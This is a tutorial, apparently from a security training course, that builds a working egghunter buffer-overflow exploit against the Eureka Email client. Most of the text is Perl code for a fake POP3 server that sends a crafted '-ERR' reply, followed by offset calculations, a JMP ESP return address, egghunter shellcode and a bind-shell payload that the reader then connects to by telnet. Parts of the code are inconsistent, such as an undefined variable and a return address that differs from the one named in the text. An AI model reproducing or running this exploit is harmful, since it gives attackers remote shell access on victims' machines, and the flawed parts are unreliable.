In classic stack based buffer overflow, the buffer size is big enough to hold the shellcode.
But, what will happen if there is not enough consecutive memory space available for the shellcode to fit in after
overwrite happens.
This vulnerability gets triggered when a client connects to a POP3 server. If this POP3 server sends long / specifically crafted “-ERR” data back to the client, the client crashes and arbitrary code can be executed.
Let’s build the exploit from scratch on XP SP3 English (VirtualBox).
We’ll use some simple lines of perl code to set up a fake POP3 server and send a string of 2000 bytes back (metasploit pattern).
First of all, run a Eureka Email
Setting Account Server
Create a metasploit pattern of 2000 characters from within Immunity using the following command :
#pattern_create 2000
then, attach a Eureka Email using Ollydbg, like show
use Socket;
#Metasploit pattern=2000"
my $junk = "Aa0Aa1Aa2Aa3A . .;
my $payload=$junk;
#set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print "[+] Client connected, sending evil payload\n";
while(1)
{
print CLIENT "-ERR ".$payload."\n";
print "
-> Sent ".length($payload)." bytes\n";
}
}
close CLIENT;
print "[+] Connection closed\n";
Run a Fuzzer
root@bt:/media/Document/IS2C-febri/Day6/egghunter# perl cobaegg.pl
[+] Listening on tcp port 110 [POP3]...
[+] Configure Eureka Mail Client to connect to this host
then, on Eureka Email choose file window and Send and Receive emails
Look at the Ollydbg Log and registers : “Access violation when executing [41377841]”
Registers look like this :
of the information shown above, EIP 41377841 and ESP x8Ax9Ay
Now we are looking for pattern offset of EIP and ESP. Like the command
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 41377841
711
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb x8Ax9A
715
and then, modify your fuzzer
use Socket;
#Metasploit pattern=2000"
my $junkeip = "\x41" x 711;
my $junkesp = "\x42" x 4;
my $junkcrash = "\x43" x 2000;
my $payload=$junk;
#set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print "[+] Client connected, sending evil payload\n";
while(1)
{
print CLIENT "-ERR ".$payload."\n";
print "
-> Sent ".length($payload)." bytes\n";
}
}
close CLIENT;
print "[+] Connection closed\n";
The Result we can see, the crash override on ESP
search module containing the JMP ESP [07429353].
Do Break Point step for testing. And Nice the result is
for the next Step, we try to calculator payload.
and modify your fuzzer
use Socket;
#Metasploit pattern=2000"
my $junkeip = "\x41" x 711;
my $junkesp = "\x53\x93\x42\x7E";
my $junkloncat = "\x90" x 8;
my $junkcrash = "\xda\xdd\x2b\xc9\xd9 . ."; # Calc.exe
my $payload=$junkeip.$junkesp.$junkloncat.$junkcrash;
#set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print "[+] Client connected, sending evil payload\n";
while(1)
{
print CLIENT "-ERR ".$payload."\n";
print "
-> Sent ".length($payload)." bytes\n";
}
}
close CLIENT;
print "[+] Connection closed\n";
Run Eureka Email without Ollydbg, then run the fuzzer.
Now choose file window - Send and Receive emails. And Look a Result calculator pop up
After we success with a calculator, now lets try for a Bind Shell Payload.
modify your fuzzer with the result of Bind Shell Payload. Like this
use Socket;
#Metasploit pattern=2000"
my $junkeip = "w00tw00t".
"\x31\xc9\xb1\x51\xba . .; # size 344+w00tw00t=352
my $junktambah = "\x90" x 359;
my $junkesp = "\x53\x93\x42\x7E";
my $junkloncat = "\x90" x 8;
my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"\x77\x30\x30\x74". # this is the marker/tag: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
my $payload=$junkeip.$junktambah.$junkesp.$junkloncat.$egghunter;
#set up listener on port 110
my $port=110;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+] Listening on tcp port 110 [POP3]... \n";
print "[+] Configure Eureka Mail Client to connect to this host\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print "[+] Client connected, sending evil payload\n";
while(1)
{
print CLIENT "-ERR ".$payload."\n";
print "
-> Sent ".length($payload)." bytes\n";
}
}
close CLIENT;
print "[+] Connection closed\n";
Note: Size of bind Shell only 344, while to achieve EIP need 711.
So we need a new variable for achievement EIPmy $junktambah = "\x90" x 359;
So, 344+w00tw00t+359=711
Alright, Now run a Eureka Email without Ollydbg.
Run a Fuzzer. And choose file - Send and receive emails window on the Eureka email.
Now, let's try Telnet like this
Nice, Successfully :-)
Good Luck !!!